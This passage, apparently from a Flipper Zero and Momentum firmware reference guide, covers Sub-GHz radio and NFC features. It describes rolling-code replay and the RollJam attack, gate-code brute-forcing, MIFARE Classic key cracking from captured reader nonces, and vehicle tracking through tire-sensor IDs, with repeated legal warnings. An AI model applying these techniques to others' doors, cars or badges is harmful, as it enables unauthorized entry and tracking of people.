The Momentum Encyclopedia

Every app, feature, protocol, and CLI command for Flipper Zero + Momentum firmware. The definitive reference.

Sub-GHz NFC RFID Infrared BadUSB BLE Spam Marauder GPIO

80+

Apps Documented

Major Sections

40+

Protocols

100+

CLI Commands

🐬 What is Flipper Zero + Momentum

Beginner🐬🐬🐬🐬🐬

The Swiss Army knife of wireless hacking. A pocket-sized multi-tool for pentesters, researchers, and curious hackers — supercharged with Momentum custom firmware.

🔧 Hardware Overview ▼

Flipper Zero packs seven radio interfaces into a device the size of a car key. Here's what's inside:

Module	Chip	Frequency	What It Does
Sub-GHz	TI CC1101	300–928 MHz (stock) / 281–962 MHz (Momentum)	Garage doors, car keyfobs, weather stations, doorbells, wireless sensors
NFC	ST25R3916	13.56 MHz	MIFARE Classic, Ultralight, NTAG, DESFire, transit cards, access badges
125 kHz RFID	Custom analog	125 kHz	HID ProxCard, EM4100, Indala — building access, old hotel keys
Infrared	TSOP75338 + IR LED	38 kHz carrier	TVs, ACs, projectors, fans — any IR remote
Bluetooth	STM32WB55 (built-in)	2.4 GHz BLE 5.0	BLE spam, Bad Keyboard, FindMy, HID devices
GPIO	18 pins (3.3V)	—	UART, SPI, I2C, 1-Wire, analog — connect WiFi boards, sensors, modules
USB-C	USB 2.0 FS	—	BadUSB, data transfer, charging, UART bridge
iButton	1-Wire contact	—	Dallas/Cyfral/Metakom keys (intercom access)

Additional hardware: 1.4" 128×64 LCD (monochrome, orange backlight or RGB with Momentum), microSD slot (up to 256GB), 5-button d-pad + back button, 2000mAh battery (~7 days standby, ~2 hours active radio use), vibration motor.

⚡ Why Momentum Over Stock Firmware ▼

Momentum is the most actively developed custom firmware for Flipper Zero. Here's what you get over the official firmware:

Feature	Stock Firmware	Momentum
Sub-GHz Range	300–928 MHz	281–361, 378–481, 749–962 MHz (extended)
Rolling Codes	Read only (no replay)	Full capture + replay (KeeLoq, StarLine, Nice, etc.)
BLE Spam	Not available	Apple, Samsung, Google, Windows, Sour Apple
Bad Keyboard	Not available	Wireless BadUSB via Bluetooth
FindMy Flipper	Not available	Track via Apple FindMy network
Extra Apps	~15 built-in	80+ apps (Metroflip, MFKey, Marauder, etc.)
RGB Backlight	Orange only	Full RGB color customization
Asset Packs	Limited animations	100+ community animation packs
Passport	Basic	Custom themes, backgrounds, icons
Sub-GHz Bruteforcer	Not available	Brute force static codes for gates/barriers
Protocol Support	Standard set	Extended with community contributions

Note

Momentum merges upstream Flipper updates quickly, so you get stock features + all the extras. It's maintained by a dedicated team and has the largest community of any custom firmware.

🚀 Quick Start Guide ▼

Flash Momentum Firmware

Connect Flipper to computer via USB-C cable. Make sure it's powered on.

Open Chrome/Edge and go to momentum-fw.dev/update (requires WebSerial — Chrome/Edge only).

Click "Connect" and select your Flipper from the serial port list.

Select Release channel (stable) and click "Install". The process takes ~3 minutes.

Flipper reboots automatically. You're running Momentum! Check via Menu → Settings → About.

Tip

First flash may require you to enter DFU mode: hold ← (back) + ◀ (left) while plugging in USB. The LED turns blue in DFU mode.

Set Up the Dashboard

This site (flipper.llm.kaveenk.com) provides a remote dashboard for controlling your Flipper Zero. It connects via a bridge running on the same network as your Flipper. Use it to send CLI commands, trigger Sub-GHz transmissions, read NFC cards, and more — all from your browser.

Essential First Steps

Insert a microSD card — most features require it for storage (saved signals, keys, databases)
Update databases — go to Momentum App → keep the NFC/RFID/IR databases up to date
Configure Sub-GHz region — Momentum App → Protocols → enable extended frequencies
Set up GPIO — if you have a WiFi Dev Board, attach it to the GPIO header now

📡 Sub-GHz Radio

Intermediate🐬🐬🐬🐬🐬

The CC1101 radio transceiver handles everything from garage doors and car keyfobs to weather stations and wireless doorbells. Momentum unlocks extended frequencies, rolling code replay, and brute-force attacks. This section covers the radio hardware, modulation types, every supported protocol, and real-world attack scenarios.

📻 How Sub-GHz Radio Actually Works

🔬 The CC1101 Transceiver — What It Can & Can't Do

Beginner

▼

"Sub-GHz" means any radio frequency below 1 GHz. These frequencies are used worldwide for low-power, long-range communication — think garage doors, car keyfobs, weather stations, and IoT sensors. They travel farther than WiFi or Bluetooth and penetrate walls better.

The Flipper Zero uses a Texas Instruments CC1101 transceiver chip — a dedicated radio IC that handles both transmitting and receiving. Here's what's inside:

📡AntennaInternal PCB antenna, or external via CC1101 module

⚡CC1101 ICTexas Instruments radio transceiver, 300–928 MHz

🧠MCUSTM32WB55 processes decoded signals

📤TX PowerMax +10 dBm (~10 mW)

📥RX Sensitivity-116 dBm @ 0.6 kBaud

📊Data Rate0.6–500 kBaud configurable

What It CAN Do

Receive and transmit on 300–928 MHz (stock) or 281–962 MHz (Momentum)
Decode 40+ protocols automatically (Princeton, CAME, KeeLoq, weather stations, etc.)
Capture raw radio data for unknown protocols
Multiple modulation modes: ASK/OOK, 2-FSK, 4-FSK, GFSK, MSK
Act as a frequency analyzer to detect unknown transmissions

What It CAN'T Do

WiFi or Bluetooth — those are 2.4 GHz, completely different hardware
Cellular signals — 700+ MHz cellular uses different modulation and power
Wideband signals — CC1101 is narrowband only (~58 kHz max bandwidth)
Simultaneous TX/RX — it's half-duplex, one direction at a time
Jam effectively at range — 10 mW is very low power compared to actual jammers

Range

Setup	Indoor Range	Outdoor Range
Internal antenna	~20–50 m	~50–100 m
External CC1101 module	~50–100 m	~200–500 m
External + directional antenna	N/A	~500 m–1+ km

Legal Note

Transmission power is regulated by region. In the US, FCC Part 15 limits unlicensed Sub-GHz transmissions to specific frequencies and power levels. The Flipper's +10 dBm is well within legal limits for ISM bands (315, 433, 868, 915 MHz), but transmitting on other frequencies may violate regulations. Momentum's extended range opens frequencies outside these bands — know your local laws.

〰️ Modulation Types Explained Simply

Beginner

▼

Modulation is how data is encoded into radio waves. Different devices use different modulation, and the Flipper must match the modulation to decode a signal. Think of it like languages — the Flipper speaks several.

ASK / OOK

Amplitude Shift Keying / On-Off Keying

Simplest form. Signal is either on (1) or off (0). Like flashing a flashlight. Extremely common in consumer devices.

📍 Garage doors, doorbells, cheap remotes, fan remotes, power outlets

2-FSK

Frequency Shift Keying

Shifts between two frequencies to represent 1s and 0s. More resistant to noise than ASK. The signal is always "on" — just at different pitches.

📍 Car keyfobs, some weather stations, TPMS sensors

GFSK

Gaussian Frequency Shift Keying

FSK with a Gaussian filter that smooths transitions, reducing bandwidth. Used in protocols that need cleaner signals.

📍 Some sensors, Bluetooth-adjacent protocols, newer IoT

MSK

Minimum Shift Keying

Special case of FSK with minimum frequency deviation. Very spectrum-efficient.

📍 Specialized industrial, some pager protocols

Practical Tip

Don't know the modulation? Use Read first — it tries known protocols automatically. If that fails, use Read RAW to capture the raw waveform regardless of modulation. You can also use the CLI's subghz decode_raw to try decoding with different parameters offline.

🔐 Static vs Rolling Codes — The Key Difference

🔑 Static Codes — The Password That Never Changes

Beginner

▼

A static code system sends the exact same signal every single time you press the button. Like a password that never changes. Capture it once, and you can replay it forever.

STATIC CODE — Same signal every time Press 1: [AA BB CC DD] → Garage opens ✅ Press 2: [AA BB CC DD] → Garage opens ✅ (same code!) Press 3: [AA BB CC DD] → Garage opens ✅ (still the same!) Flipper replay: [AA BB CC DD] → Garage opens ✅ (captured code works!)

Where You'll Find Static Codes

Old garage doors — DIP switch models (set code with physical switches inside the remote)
Wireless doorbells — almost all consumer doorbells
Cheap RF power outlets — 433 MHz remote-controlled plugs
Fan remotes — ceiling fan RF controllers
Gate remotes (older) — CAME, Nice FLO, Linear, GateTX
Restaurant buzzers — most pager-style buzzers

Common Static Code Protocols

Princeton (24-bit) CAME (12/24-bit) Nice FLO (12-bit) Linear (10-bit) Gate TX Holtek HT12x Ansonic SMC5326 Marantec Honeywell

How to Tell

If you capture a signal twice and the data is identical — it's static. Also, devices with physical DIP switches for code setting are always static.

🔄 Rolling Codes — One-Time Passwords for Radio

Intermediate

▼

A rolling code (also called "hopping code") generates a different signal every press. Both the remote and receiver share a secret key and a synchronized counter. Each press increments the counter and produces a new cryptographic code. Capturing a code is useless — it's already been "consumed."

ROLLING CODE — Different signal every time Press 1: [CODE_0x001] → Garage opens ✅ (counter: 1) Press 2: [CODE_0x002] → Garage opens ✅ (counter: 2) Press 3: [CODE_0x003] → Garage opens ✅ (counter: 3) Flipper replay CODE_0x001: → REJECTED ❌ (already used!) Flipper replay CODE_0x002: → REJECTED ❌ (already used!)

How the Counter Sync Works

Remote and receiver both start at counter value N
Each press increments the remote's counter and generates a code: encrypt(counter, secret_key)
The receiver only accepts codes with a counter ahead of its last-seen value
There's a window (typically 256 codes ahead) — so pressing the button when out of range doesn't permanently desync
If someone replays a code with a counter behind the receiver's current position → rejected

Stock vs Momentum Firmware

Capability	Stock Firmware	Momentum Firmware
Capture rolling codes	✅ Yes	✅ Yes
Decode rolling code protocol	✅ Yes	✅ Yes
Replay rolling codes	❌ Blocked	✅ Allowed
Pair as new remote	❌ No	✅ Yes (Add Manually)
Brute force static codes	❌ No app	✅ Bruteforcer app

Common Rolling Code Protocols

KeeLoq Security+ 2.0 Chamberlain StarLine Nice FloR-S CAME Atomo Doorhan Somfy RTS BFT Mitto Alutech

Legal Warning

Replaying or manipulating rolling codes on devices you don't own is illegal. Use only on your own equipment for security research and education.

⚔️ The RollJam Attack — How Rolling Codes Get Beaten

Expert

▼

The RollJam attack (demonstrated by Samy Kamkar in 2015) exploits a fundamental weakness in rolling code systems. It doesn't break the crypto — it games the protocol.

How It Works

Victim presses remote — the attacker jams the signal so the receiver never gets it, while simultaneously recording the code (CODE_001).

Victim presses again (thinking the first press didn't work) — the attacker jams AND records this second code (CODE_002), then replays CODE_001 to open the door. Victim thinks their remote worked.

Now the attacker has CODE_002 — an unused, valid rolling code. The receiver is at counter 001. CODE_002 is still in the acceptance window.

The attacker can replay CODE_002 at any point later to open the door.

ROLLJAM ATTACK SEQUENCE Step 1: Victim press → [CODE_001] → JAMMED (attacker records CODE_001) Step 2: Victim press → [CODE_002] → JAMMED (attacker records CODE_002) Attacker replays → [CODE_001] → Door opens (victim happy) Step 3: Attacker now has CODE_002 → unused, valid → FULL ACCESS

Why This Works

Rolling code receivers accept codes within a window ahead of the last accepted counter
If CODE_001 was accepted and CODE_002 is next in sequence, it's valid
The jamming prevents the receiver from ever seeing the code, so the counter doesn't advance past it

Requirements

A jammer on the exact frequency — the Flipper alone can't effectively jam and capture simultaneously (you'd need a second device or external CC1101 module)
Proximity — close enough to both jam the receiver and capture the remote's signal
Timing — must jam before the receiver processes the signal

Defenses

Time-based rolling codes — codes expire after a short window (not commonly implemented)
Dual-code verification — receiver requires two consecutive valid codes (some newer systems)
Lock-down on jammed signals — receiver detects jamming patterns (rare in consumer gear)

Reality Check

The RollJam attack requires additional hardware beyond the Flipper (a jammer). It's primarily of academic interest and security research value. It demonstrates why rolling codes alone aren't a complete security solution.

📻 Built-in Sub-GHz Features

📥 Read — Capture Signals

Beginner

▼

The primary capture mode. Listens on a specific frequency and decodes known protocols in real-time.

How it works

Navigate to Sub-GHz → Read
Set frequency (common: 315 MHz, 433.92 MHz, 868 MHz, 915 MHz)
Press a button on the target remote — Flipper decodes the signal
Save the capture for later replay

What you can capture

Garage door openers — static code remotes (older DIP switch models)
Car keyfobs — signal is visible, but rolling codes won't replay on stock firmware
Weather stations — temperature/humidity data from Oregon Scientific, Acurite, LaCrosse, etc.
Doorbells — wireless doorbell chimes
Wireless sensors — motion detectors, door/window sensors, smoke alarms
Gate remotes — barrier gates, parking lot remotes

Tip

Don't know the frequency? Use Frequency Analyzer first to detect what frequency a device transmits on.

📊 Read RAW — Capture Raw Radio Data

Intermediate

▼

Captures raw radio data without trying to decode it. Essential for unknown or unsupported protocols.

When to use

The signal isn't recognized by the standard Read mode
You need to capture the exact waveform for analysis
Custom or proprietary protocols
Complex signals with multiple components

Usage

Sub-GHz → Read RAW
Set frequency, press record (●), trigger the remote, stop recording
File saved as .sub with raw timing data
Can be replayed from Saved menu
Can be analyzed with subghz decode_raw CLI command

Note

RAW captures are larger files than decoded captures. They record exact pulse/gap timings. Quality depends on signal strength — get close to the transmitter.

📤 Saved — Replay Captured Signals

Beginner

▼

Browse your saved .sub files and replay them. This is how you transmit captured signals.

Sub-GHz → Saved → browse SD card folders
Select a file → press Send (→) to transmit
Works for static codes immediately
Rolling codes: stock firmware blocks replay; Momentum allows it

File Organization

Saved files go to /ext/subghz/ on the SD card. Organize by folder:

/ext/subghz/
├── garage/
│   ├── home_garage.sub
│   └── work_gate.sub
├── doorbells/
│   └── front_door.sub
└── weather/
    └── station_433.sub

📈 Frequency Analyzer

Beginner

▼

Real-time spectrum analyzer that shows which frequency a device is transmitting on.

Sub-GHz → Frequency Analyzer
Press the remote/button you want to analyze
Flipper shows the detected frequency with signal strength
Use this frequency in Read or Read RAW mode

Common frequencies to know:

Frequency	Region	Common Uses
`315.00 MHz`	North America	Garage doors, car keyfobs (older US vehicles)
`390.00 MHz`	North America	Some car keyfobs (GM, older models)
`433.92 MHz`	Worldwide	Most common — weather stations, doorbells, remotes, sensors
`868.35 MHz`	Europe	Gate remotes, alarm systems, IoT devices
`915.00 MHz`	North America	ISM band, LoRa, some IoT

✏️ Add Manually — Create Signals

Advanced

▼

Create Sub-GHz signals from known protocol parameters without capturing them.

Sub-GHz → Add Manually
Select protocol (Princeton, CAME, Nice FLO, etc.)
Enter key/data value, bit length
Set frequency and save

Useful when you know the exact code (e.g., from documentation, DIP switch positions on a garage remote, or shared by another tool).

⚡ Momentum Extras

🔓 Extended Frequency Range

Beginner🐬🐬🐬🐬

▼

Momentum unlocks the full capability of the CC1101 radio chip beyond what stock firmware allows.

Band	Stock Range	Momentum Range
Low	300–348 MHz	281–361 MHz
Mid	387–464 MHz	378–481 MHz
High	779–928 MHz	749–962 MHz

Enable via: Momentum App → Protocols → Sub-GHz → Extend

Warning

Extended frequencies may violate local radio regulations. Transmitting outside licensed bands is illegal in many jurisdictions. Know your local laws.

🔄 Rolling Code Capture & Replay

Advanced🐬🐬🐬🐬🐬

▼

Stock firmware intentionally blocks replaying rolling (hopping) codes. Momentum removes this restriction, enabling capture and replay of rolling code signals.

How Rolling Codes Work

Each button press generates a unique code from a synchronized counter. The receiver only accepts the next expected code in sequence. Capturing and replaying an old code normally doesn't work because the receiver has already moved past it.

Why Replay Can Still Work

Jam + Capture — Block the original signal while recording it. The receiver never sees the code, so it remains valid. Requires a secondary jammer.
RollJam attack — Jam the first press, capture it. Victim presses again, jam + capture the second code. Replay the first code (victim's car opens), save the second for later.
Code window vulnerability — Many receivers accept codes within a window of ~256 ahead of current counter. If you capture a code the victim hasn't used yet, it may still be valid.

Supported Rolling Code Protocols

KeeLoq StarLine Nice FLO R-S CAME Atomo Doorhan Security+ 2.0 Chamberlain Alutech BFT Mitto Somfy RTS

Legal Warning

Replaying car keyfob or garage rolling codes without authorization is illegal. Use only on your own devices for security research.

🔨 Sub-GHz Bruteforcer

Advanced🐬🐬🐬🐬

▼

Systematically tries all possible codes for a given protocol. Works only against static code systems (no rolling codes).

Supported Protocols

Chamberlain 9-bit — 512 codes, ~2 minutes
Chamberlain 8-bit — 256 codes, ~1 minute
Linear 10-bit — 1024 codes, ~4 minutes
Nice 12-bit — 4096 codes, ~17 minutes
CAME 12-bit — 4096 codes, ~17 minutes
Princeton 24-bit (custom) — specify prefix, brute remainder

Usage

Navigate to Sub-GHz → Bruteforcer (Momentum menu)
Select protocol and frequency
Start the brute force — Flipper cycles through all codes
When the gate/device responds, note the working code

Warning

Brute forcing takes time and may trigger lockouts on some systems. Only use on devices you own or have explicit authorization to test.

⏰ Sub-GHz Scheduler

Intermediate🐬🐬🐬

▼

Schedule Sub-GHz transmissions for a specific time. Set up a signal to transmit later — useful for timed automation tests.

Select a saved .sub file
Set the time and frequency
Flipper transmits automatically at the scheduled time

🤝 Flipper Share

Beginner🐬🐬

▼

Share captured Sub-GHz signals between two Flipper Zero devices wirelessly using the Sub-GHz radio itself. One Flipper transmits the capture data, another receives it.

📟 HC-11 Modem

Advanced🐬🐬

▼

Use the Flipper as an HC-11 compatible UART modem over Sub-GHz radio. Enables serial communication between devices at 433 MHz.

Emulates HC-11 wireless serial module
Send/receive UART data wirelessly
Useful for IoT prototyping and embedded systems testing

📊 Sub Analyzer — Spectrum Analysis

Intermediate🐬🐬🐬

▼

Visual spectrum analyzer showing real-time RSSI (signal strength) across a frequency range. Sweep across bands to find active transmitters.

Sweep configurable frequency range
Visual waterfall/graph display
Identify active frequencies before targeted capture
Useful for RF environment mapping

💬 Sub-GHz Chat

Beginner🐬🐬🐬🐬

▼

Send text messages between two Flipper Zero devices using Sub-GHz radio — no WiFi, cellular, or internet required.

Both Flippers set to same frequency (e.g., 433.92 MHz)
Type messages using Flipper's on-screen keyboard or via CLI
Range depends on environment: ~50m indoors, ~200m outdoors with clear line of sight
CLI: subghz chat <freq>

🏠 Pair Flipper as a Garage Remote (Momentum)

🔧 Step-by-Step: Register Flipper as a Legitimate Remote

Intermediate🐬🐬🐬🐬🐬

▼

Instead of replaying captured signals, you can register the Flipper as a brand new remote with your garage door opener. The opener "learns" the Flipper's signal, making it a legitimate paired device — no replay, no hacking. This works because the Flipper can generate valid protocol signals that the opener's "learn" mode accepts.

Requirement

This requires Momentum firmware (or another custom firmware that unlocks Add Manually for rolling code protocols). Stock firmware does not support generating new rolling code signals.

Before You Start

Find your garage door opener model number (printed on the motor unit on your ceiling)
Determine the protocol: most modern US openers use Security+ or Security+ 2.0 (Chamberlain, LiftMaster, Craftsman)
Determine the frequency: check the FCC label on your existing remote or the opener unit
- LiftMaster/Chamberlain (purple learn button) → 310 MHz
- LiftMaster/Chamberlain (yellow learn button) → 315 MHz
- LiftMaster/Chamberlain (red/orange learn button) → 390 MHz
- Chamberlain myQ (newer) → Security+ 2.0 @ 310 or 315 MHz

Pairing Steps

On the Flipper: Navigate to Sub-GHz → Add Manually

Select the protocol: Choose Cham_Code (Security+) or Security+ 2.0, depending on your opener

Set the frequency: Match your opener (310, 315, or 390 MHz). Leave the key/serial at default — the opener doesn't care about the specific code during learning, just the protocol format.

Save the signal with a descriptive name (e.g., "Home_Garage")

On the opener: Press and hold the Learn button on the motor unit until the LED lights up (usually ~6 seconds). The location varies by model but it's typically near the antenna wire.

On the Flipper: Go to Saved → Home_Garage → Send. Transmit the signal within 30 seconds of pressing the Learn button.

The opener's LED should blink or turn off, confirming it learned the Flipper as a new remote. Test it — transmit again and the door should respond.

Pro Tips

If it doesn't work on the first try, delete the signal, create a new one with a different key/serial value, and try again. Some openers are picky about format.
Each "learned" signal is a unique remote. You can pair multiple signals for different buttons (open, close, light).
This does NOT work with openers that require proprietary multi-channel handshakes (some newer myQ models).
For European gates using CAME, Nice, BFT — the same process works with their respective protocols.

Important

Only pair with garage doors you own. Adding a new remote to someone else's opener is unauthorized access.

🌡️ Weather Station Monitoring

Beginner🐬🐬🐬

▼

Most consumer weather stations transmit sensor data at 433 MHz using unencrypted protocols. The Flipper (especially with Momentum) decodes these automatically, letting you see temperature, humidity, and other readings from nearby stations — including your neighbors'.

How to Monitor

Navigate to Sub-GHz → Read
Set frequency to 433.92 MHz
Nearby weather stations will show up as decoded readings with temperature and humidity data
Each station has a unique sensor ID — you can track multiple stations simultaneously

Supported Weather Protocols

Protocol	Data Decoded	Common Brands
Oregon Scientific V2.1/V3	Temp, humidity, channel	Oregon Scientific
Acurite 592TXR	Temp, humidity, sensor ID	AcuRite
Acurite 606TX / 609TXC	Temp, humidity	AcuRite
LaCrosse TX	Temp, humidity	La Crosse Technology
Ambient Weather	Temp, humidity	Ambient Weather
ThermoPRO TX-2	Temp, humidity	ThermoPro
Nexus-TH	Temp, humidity	Nexus, various clones
Infactory	Temp, humidity	Infactory

Fun Project

Walk around your neighborhood with the Flipper in Read mode at 433 MHz. You'll likely pick up 5–10+ weather stations within a few blocks. Each one broadcasts its sensor readings every 30–90 seconds. All completely unencrypted.

🚗 TPMS — Tire Pressure Monitoring

Intermediate🐬🐬🐬

▼

Every car manufactured since 2007 (US) or 2014 (EU) has Tire Pressure Monitoring System sensors in each wheel. These broadcast wirelessly at 315 MHz (North America) or 433 MHz (Europe/Asia) every 60–90 seconds, or immediately when pressure changes.

What the Flipper Decodes

Tire pressure — current PSI/kPa
Temperature — tire temperature in °C/°F
Sensor ID — unique 28/32-bit identifier for each sensor
Battery status — some protocols include low-battery flag

Supported TPMS Protocols

Schrader Schrader GG4 Citroën/Peugeot Toyota Ford

Security Concern

TPMS sensor IDs are unique and static — they never change unless the sensor is replaced. This means:

Each car has a unique "fingerprint" of 4 TPMS IDs
Anyone with a receiver can track a specific car's presence by monitoring for its TPMS IDs
This has been demonstrated by researchers as a vehicle tracking vector
No encryption, no authentication — just a broadcast beacon on every wheel

Practical Use

Check your own car's tire pressure wirelessly without a gauge. Just park near it with the Flipper in Sub-GHz Read mode at 315 MHz (US) or 433 MHz (EU). Wait up to 90 seconds for the sensors to transmit.

📋 Sub-GHz Protocol Encyclopedia

📡 Complete Protocol Encyclopedia — All 40+ Protocols

Intermediate

▼

Every Sub-GHz protocol supported by Flipper Zero + Momentum firmware, with type, frequency, bit depth, security rating, and common devices.

Showing all 40 protocols

Protocol	Type	Frequency	Bits	Security	Common Devices
Princeton	Static	433 MHz	24	🔴 None	Generic remotes, doorbells, power outlets, fan remotes
CAME	Static	433 MHz	12/24	🔴 None	European gates, parking barriers
CAME Atomo	Rolling	433 MHz	—	🟡 Weak	Newer CAME gate systems
CAME Twee	Static	433 MHz	54	🔴 None	CAME variant, Italian gates
Nice FLO	Static	433 MHz	12	🔴 None	European gates, barriers (Nice S.p.A.)
Nice FloR-S	Rolling	433 MHz	52	🟡 Weak	Newer Nice gate systems
Gate TX	Static	433 MHz	24	🔴 None	Generic gate remotes
Linear	Static	300/310 MHz	10	🔴 None	Old US garage doors (DIP switches, 1024 codes total)
Doorhan (static)	Static	433 MHz	24	🔴 None	Russian gate systems (older)
Doorhan (rolling)	Rolling	433 MHz	—	🟡 Weak	Russian gate systems (newer)
Security+ 1.0	Rolling	310/315/390 MHz	40	🟡 Weak	Chamberlain/LiftMaster (older US garage doors)
Security+ 2.0	Rolling	310/315/390 MHz	62	🟢 Strong	Chamberlain/LiftMaster/Craftsman (modern US garage doors, myQ)
Marantec	Static	433 MHz	—	🔴 None	European garage doors (Marantec GmbH)
BFT (static)	Static	433 MHz	12	🔴 None	European gates (BFT S.p.A., older)
BFT Mitto	Rolling	433 MHz	—	🟡 Weak	European gates (BFT, newer models)
Somfy Telis/RTS	Rolling	433 MHz	56	🟡 Weak	French blinds, shutters, awnings (Somfy Group)
StarLine	Rolling	433 MHz	64	🟡 Weak	Russian car alarm systems
KeeLoq	Rolling	Various	66	🟡 Weak	Used by MANY manufacturers — gates, cars, alarms. Microchip Technology algorithm.
Alutech AT-4N	Rolling	433 MHz	—	🟡 Weak	Russian/CIS gates and barriers
Centurion	Rolling	433 MHz	—	🟡 Weak	South African gate systems
Magellan	Rolling	433 MHz	—	🟡 Weak	Security alarm remotes
Holtek HT12x	Static	Various	12	🔴 None	Generic encoder IC — used in countless DIY and consumer remotes
Honeywell	Static	345 MHz	—	🔴 None	US home security sensors (door, window, motion)
Ansonic	Static	433 MHz	12	🔴 None	European gate remotes
SMC5326	Static	330/433 MHz	25	🔴 None	Malaysian/Asian gate remotes, parking barriers
UNILARM	Static	433 MHz	25	🔴 None	Generic alarm remotes
Intertechno V3	Static	433 MHz	32	🔴 None	Smart home power outlets (European)
Doitrand	Static	433 MHz	37	🔴 None	French gate remotes
Phoenix V2	Static	433 MHz	—	🔴 None	European gate remotes
Viking	Static	433 MHz	—	🔴 None	Viking gate and access systems
Nero Sketch/Radio	Static	433 MHz	—	🔴 None	Nero branded controllers
Power Smart	Static	433 MHz	24	🔴 None	Smart power outlets
Oregon Scientific V2.1/V3	Sensor	433 MHz	—	🔴 None	Oregon Scientific weather stations
Acurite 592TXR / 606TX / 609TXC	Sensor	433 MHz	—	🔴 None	AcuRite weather stations and sensors
LaCrosse TX	Sensor	433 MHz	—	🔴 None	La Crosse Technology weather stations
Ambient Weather	Sensor	433 MHz	—	🔴 None	Ambient Weather stations
ThermoPRO TX-2	Sensor	433 MHz	—	🔴 None	ThermoPro sensors
Nexus-TH	Sensor	433 MHz	36	🔴 None	Nexus weather sensors, various rebrands
TPMS (Schrader)	Sensor	315/433 MHz	—	🔴 None	Tire pressure sensors (cars, trucks)
TPMS (Toyota/Ford/Citroën)	Sensor	315/433 MHz	—	🔴 None	OEM tire pressure sensors
POCSAG	Pager	Various	—	🔴 None	Pager messages (hospital pagers, restaurant buzzers)

Note on Security Ratings

🔴 None: No code security whatsoever — capture and replay freely.
🟡 Weak: Rolling code, but algorithm has known weaknesses (KeeLoq is cryptanalyzed, others have insufficient entropy). Replay possible with Momentum firmware; pairing bypass possible.
🟢 Strong: Modern rolling code with adequate key length and no publicly known full breaks. Pairing as new remote is the practical approach.

🎯 Novel & Creative Uses

🏠

Clone Your Garage Door

Capture the signal from your garage remote and replay it from the Flipper. Works instantly for static code openers (DIP switch models). Or pair as a new remote for rolling code systems.

🐬🐬🐬🐬🐬

🔔

Clone Your Doorbell

Almost all wireless doorbells use static 433 MHz codes. One capture = ring it whenever you want. Great for testing, or replacing a lost remote.

🐬🐬🐬

🔌

Control RF Power Outlets

Cheap 433 MHz remote-controlled plugs (sold on Amazon) all use static codes. Capture the remote once, then control the outlets from Flipper.

🐬🐬🐬🐬

🌡️

Spy on Weather Stations

Decode every weather station in your neighborhood. See temperature and humidity from 10+ stations on a single walk. All unencrypted.

🐬🐬🐬

💬

Flipper-to-Flipper Chat

Text your friends over radio waves. No cell tower, no internet. Works up to 200m outdoors at 433 MHz. Built into Momentum.

🐬🐬🐬🐬🐬

🍽️

Decode Restaurant Buzzers

Those vibrating puck pagers use simple Sub-GHz signals. Capture and replay them for research (please don't abuse this at restaurants).

🐬🐬🐬

🔍

RF Environment Mapping

Use Frequency Analyzer and Sub Analyzer to survey the RF environment. Find out what's transmitting, at what frequency, how often. IoT forensics in your pocket.

🐬🐬🐬🐬

🚗

Check Tire Pressure Wirelessly

Decode TPMS signals from your car's tire sensors. See pressure and temperature without a gauge. Also reveals unique sensor IDs (vehicle tracking risk).

🐬🐬🐬

⌨️ CLI Commands

💻 Sub-GHz CLI Reference ▼

Command	Description	Example
`subghz tx`	Transmit a signal with specified parameters	`subghz tx DEADBEEF 433920000 420 3 0`
`subghz rx`	Receive/listen on a frequency	`subghz rx 433920000 0`
`subghz tx_from_file`	Transmit a saved .sub file	`subghz tx_from_file /ext/subghz/garage.sub 3 0`
`subghz decode_raw`	Decode a RAW capture file offline	`subghz decode_raw /ext/subghz/raw_capture.sub`
`subghz chat`	Enter chat mode with another Flipper	`subghz chat 433920000 0`

Parameter Reference

Parameter	Description	Values
`<hex>`	Data payload in hex	e.g., `DEADBEEF`
`<freq>`	Frequency in Hz	e.g., `433920000` = 433.92 MHz
`<te>`	Timing element in µs	e.g., `420` for Princeton
`<repeat>`	Number of transmissions	`1`–`10` typical
`<device>`	Radio device index	`0` = internal CC1101

📱 NFC (13.56 MHz)

Intermediate🐬🐬🐬🐬🐬

Read, emulate, write, and crack NFC cards. From building access badges to transit cards and Amiibo figures. Momentum adds a massive app ecosystem for advanced NFC operations.

📲 Built-in NFC Features

📖 Read — Detect & Read Cards

Beginner

▼

Place any NFC card/tag on the back of the Flipper to read it. Auto-detects card type and reads accessible data.

Supported Card Types

Type	Common Uses	Read Capability
MIFARE Classic 1K/4K	Building access, hotel keys, transit	UID + public sectors; needs keys for encrypted sectors
MIFARE Ultralight	Transit tickets, event passes	Full read (usually no auth required)
NTAG 213/215/216	NFC tags, Amiibo, smart posters	Full read (NTAG215 = Amiibo)
MIFARE DESFire EV1/EV2/EV3	Transit, modern access control	UID + application list; encrypted data requires keys
EMV (Credit Cards)	Contactless payment	UID + some public data; cannot clone or transact
FeliCa	Japanese transit (Suica, PASMO)	UID + limited data
ISO 15693 (NFC-V)	Library books, inventory	UID + blocks

🔍 Detect Reader — Capture Authentication

Advanced🐬🐬🐬🐬🐬

▼

This is the most powerful NFC feature. Emulates a card and captures authentication nonces when a real reader tries to authenticate. These nonces are used by MFKey to crack MIFARE Classic sector keys.

How It Works

First, Read the card — get the UID and any accessible data

Go to Detect Reader — Flipper emulates the card you just read

Hold Flipper to the reader (door lock, turnstile, etc.) — the reader attempts authentication

Flipper captures nonces — cryptographic exchanges that reveal key information

Run MFKey app — cracks the sector keys from captured nonces

Read card again — now with cracked keys, all sectors are readable

Tip

You may need multiple reader interactions to capture nonces for all sectors. Each sector can have different keys. Hold the Flipper to the reader 3-5 times for best results.

📤 Saved — Emulate Cards

Beginner

▼

Emulate a saved NFC card. Hold Flipper to a reader and it responds as if it's the original card.

Works best with MIFARE Classic — full emulation including encrypted sectors
MIFARE Ultralight / NTAG — full emulation
UID-only emulation — works for readers that only check UID (some basic access systems)
DESFire — UID emulation only (encrypted data not emulated)

Note

Emulation quality depends on card type. MIFARE Classic is the gold standard. For DESFire-based systems, you'll need to write to a physical card instead.

⚡ Momentum NFC Apps

🚇 Metroflip

Transit card reader and parser. Reads transit cards and displays balance, trip history, and card details.

Beginner🐬🐬🐬🐬

🏢 PicoPass / HID iClass

Read HID iClass access control cards used in building security systems. Supports standard iClass, iClass SE (with Seader), and legacy credentials.

Intermediate🐬🐬🐬🐬

🔐 Seader

Advanced credential reader for HID iClass SE, DESFire EV1/EV2, and SEOS cards. Requires SAM (Secure Access Module) for SE card reading.

Expert🐬🐬🐬🐬🐬

🔓 MFKey

MIFARE Classic key recovery. Cracks sector keys from authentication nonces captured by Detect Reader. Essential for full card dumps.

Intermediate🐬🐬🐬🐬🐬

✨ NFC Magic

